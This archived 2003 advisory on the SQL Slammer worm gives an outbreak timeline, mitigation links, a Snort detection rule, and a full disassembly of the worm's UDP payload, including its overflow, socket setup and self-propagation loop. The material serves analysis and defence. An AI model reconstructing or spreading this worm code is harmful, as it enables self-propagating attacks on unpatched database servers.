The word is that a quick fix is to firewall port 1434/UDP traffic, and
reboot the affected SQL servers.
A suggested name for this outbreak is "Bill's Tapeworm".
Last updated 2003-1-25 19:22 CST
----------------------------------------------------
Starting at 11:30pm CST, Jan 24 2003, systems from all over the
internet began sending traffic (apparently) to random destinations. At
5:30am CST, traffic rates are dropping as backbone operators and ISPs
filter UDP traffic to port 1434 (MS-SQL Monitor).
@6:30am CST, traffic at my site is down to a trickle (relatively
speaking), and CNN has heard about the worm:
http://www.cnn.com/2003/TECH/internet/01/25/internet.attack.ap/index.html
if this is affecting your servers; this might be a good url to check:
http://support.microsoft.com/default.aspx?scid=kb;EN-US;290211
...or:
http://www.postgresql.org/
...more info:
http://www.eeye.com/html/Research/Flash/AL20030125.html
http://www.securiteam.com/windowsntfocus/5TP0N1F7PS.html
...and...
http://www.kb.cert.org/vuls/id/370308
----------------------------------------------------
Suggested Snort rule to cover this worm (broken with \):
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 \
(msg:"W32.SQLEXP.Worm propagation"; \
content:"|68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E|"; \
content:"|04|"; offset:0; depth:1; reference:cve,CAN-2002-0649; \
reference:cve,CAN-2002-0650; classtype:attempted-user; \
sid:20001; rev:1;)
----------------------------------------------------
A slashdot poster pointed out my error in including portions of the IP
and UDP headers in this dump; the actual data that gets delivered to a
listening socket begins at byte 0x1c (28 decimal) in the following
dump, and *is* 0x04, meaning that this is taking advantage of an old,
known vulnerability. Earlier versions of this file reflected my own
confusion on that point, and I apologize for spreading that
confusion.
----------------------------------------------------
A better disassembly than what follows may be found at:
http://www.boredom.org/~cstone/worm-annotated.txt
Actual overflow code begins @ 0x91
Disassembly of the 404 (376 less headers) bytes being sent by affected systems:
----------------------------------------------------
0: 45 inc %ebp
1: 00 01 add %al,(%ecx)
3: 94 xchg %eax,%esp
4: 88 96 00 00 6e 11 mov %dl,0x116e0000(%esi)
a: b2 f0 mov $0xf0,%dl
c: 0c 11 or $0x11,%al
e: 03 04 d1 add (%ecx,%edx,8),%eax
11: ad lods %ds:(%esi),%eax
12: 2f das
13: 10 07 adc %al,(%edi)
15: f8 clc
16: 05 9a 01 80 1d add $0x1d80019a,%eax
1b: 81 04 01 01 01 01 01 addl $0x1010101,(%ecx,%eax,1)
22: 01 01 add %eax,(%ecx)
24: 01 01 add %eax,(%ecx)
26: 01 01 add %eax,(%ecx)
28: 01 01 add %eax,(%ecx)
2a: 01 01 add %eax,(%ecx)
2c: 01 01 add %eax,(%ecx)
2e: 01 01 add %eax,(%ecx)
30: 01 01 add %eax,(%ecx)
32: 01 01 add %eax,(%ecx)
34: 01 01 add %eax,(%ecx)
36: 01 01 add %eax,(%ecx)
38: 01 01 add %eax,(%ecx)
3a: 01 01 add %eax,(%ecx)
3c: 01 01 add %eax,(%ecx)
3e: 01 01 add %eax,(%ecx)
40: 01 01 add %eax,(%ecx)
42: 01 01 add %eax,(%ecx)
44: 01 01 add %eax,(%ecx)
46: 01 01 add %eax,(%ecx)
48: 01 01 add %eax,(%ecx)
4a: 01 01 add %eax,(%ecx)
4c: 01 01 add %eax,(%ecx)
4e: 01 01 add %eax,(%ecx)
50: 01 01 add %eax,(%ecx)
52: 01 01 add %eax,(%ecx)
54: 01 01 add %eax,(%ecx)
56: 01 01 add %eax,(%ecx)
58: 01 01 add %eax,(%ecx)
5a: 01 01 add %eax,(%ecx)
5c: 01 01 add %eax,(%ecx)
5e: 01 01 add %eax,(%ecx)
60: 01 01 add %eax,(%ecx)
62: 01 01 add %eax,(%ecx)
64: 01 01 add %eax,(%ecx)
66: 01 01 add %eax,(%ecx)
68: 01 01 add %eax,(%ecx)
6a: 01 01 add %eax,(%ecx)
6c: 01 01 add %eax,(%ecx)
6e: 01 01 add %eax,(%ecx)
70: 01 01 add %eax,(%ecx)
72: 01 01 add %eax,(%ecx)
74: 01 01 add %eax,(%ecx)
76: 01 01 add %eax,(%ecx)
78: 01 01 add %eax,(%ecx)
7a: 01 01 add %eax,(%ecx)
7c: 01 dc add %ebx,%esp
7e: c9 leave
7f: b0 42 mov $0x42,%al
81: eb 0e jmp 0x91
83: 01 01 add %eax,(%ecx)
85: 01 01 add %eax,(%ecx)
87: 01 01 add %eax,(%ecx)
89: 01 70 ae add %esi,0xffffffae(%eax)
8c: 42 inc %edx
8d: 01 70 ae add %esi,0xffffffae(%eax)
90: 42 inc %edx
91: 90 nop
92: 90 nop
93: 90 nop
94: 90 nop
95: 90 nop
96: 90 nop
97: 90 nop
98: 90 nop
99: 68 dc c9 b0 42 push $0x42b0c9dc
9e: b8 01 01 01 01 mov $0x1010101,%eax
a3: 31 c9 xor %ecx,%ecx
a5: b1 18 mov $0x18,%cl
a7: 50 push %eax
a8: e2 fd loop 0xa7
aa: 35 01 01 01 05 xor $0x5010101,%eax
af: 50 push %eax
b0: 89 e5 mov %esp,%ebp
b2: 51 push %ecx
b3: 68 2e 64 6c 6c push $0x6c6c642e
b8: 68 65 6c 33 32 push $0x32336c65
bd: 68 6b 65 72 6e push $0x6e72656b
c2: 51 push %ecx
c3: 68 6f 75 6e 74 push $0x746e756f
c8: 68 69 63 6b 43 push $0x436b6369
cd: 68 47 65 74 54 push $0x54746547
d2: 66 b9 6c 6c mov $0x6c6c,%cx
d6: 51 push %ecx
d7: 68 33 32 2e 64 push $0x642e3233
dc: 68 77 73 32 5f push $0x5f327377
e1: 66 b9 65 74 mov $0x7465,%cx
e5: 51 push %ecx
e6: 68 73 6f 63 6b push $0x6b636f73
eb: 66 b9 74 6f mov $0x6f74,%cx
ef: 51 push %ecx
f0: 68 73 65 6e 64 push $0x646e6573
f5: be 18 10 ae 42 mov $0x42ae1018,%esi
fa: 8d 45 d4 lea 0xffffffd4(%ebp),%eax
fd: 50 push %eax
fe: ff 16 call *(%esi)
100: 50 push %eax
101: 8d 45 e0 lea 0xffffffe0(%ebp),%eax
104: 50 push %eax
105: 8d 45 f0 lea 0xfffffff0(%ebp),%eax
108: 50 push %eax
109: ff 16 call *(%esi)
10b: 50 push %eax
10c: be 10 10 ae 42 mov $0x42ae1010,%esi
111: 8b 1e mov (%esi),%ebx
113: 8b 03 mov (%ebx),%eax
115: 3d 55 8b ec 51 cmp $0x51ec8b55,%eax
11a: 74 05 je 0x121
11c: be 1c 10 ae 42 mov $0x42ae101c,%esi
121: ff 16 call *(%esi)
123: ff d0 call *%eax
125: 31 c9 xor %ecx,%ecx
127: 51 push %ecx
128: 51 push %ecx
129: 50 push %eax
12a: 81 f1 03 01 04 9b xor $0x9b040103,%ecx
130: 81 f1 01 01 01 01 xor $0x1010101,%ecx
136: 51 push %ecx
137: 8d 45 cc lea 0xffffffcc(%ebp),%eax
13a: 50 push %eax
13b: 8b 45 c0 mov 0xffffffc0(%ebp),%eax
13e: 50 push %eax
13f: ff 16 call *(%esi)
141: 6a 11 push $0x11
143: 6a 02 push $0x2
145: 6a 02 push $0x2
147: ff d0 call *%eax
149: 50 push %eax
14a: 8d 45 c4 lea 0xffffffc4(%ebp),%eax
14d: 50 push %eax
14e: 8b 45 c0 mov 0xffffffc0(%ebp),%eax
151: 50 push %eax
152: ff 16 call *(%esi)
154: 89 c6 mov %eax,%esi
156: 09 db or %ebx,%ebx
158: 81 f3 3c 61 d9 ff xor $0xffd9613c,%ebx
15e: 8b 45 b4 mov 0xffffffb4(%ebp),%eax
161: 8d 0c 40 lea (%eax,%eax,2),%ecx
164: 8d 14 88 lea (%eax,%ecx,4),%edx
167: c1 e2 04 shl $0x4,%edx
16a: 01 c2 add %eax,%edx
16c: c1 e2 08 shl $0x8,%edx
16f: 29 c2 sub %eax,%edx
171: 8d 04 90 lea (%eax,%edx,4),%eax
174: 01 d8 add %ebx,%eax
176: 89 45 b4 mov %eax,0xffffffb4(%ebp)
179: 6a 10 push $0x10
17b: 8d 45 b0 lea 0xffffffb0(%ebp),%eax
17e: 50 push %eax
17f: 31 c9 xor %ecx,%ecx
181: 51 push %ecx
182: 66 81 f1 78 01 xor $0x178,%cx
187: 51 push %ecx
188: 8d 45 03 lea 0x3(%ebp),%eax
18b: 50 push %eax
18c: 8b 45 ac mov 0xffffffac(%ebp),%eax
18f: 50 push %eax
190: ff d6 call *%esi
192: eb ca jmp 0x15e
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
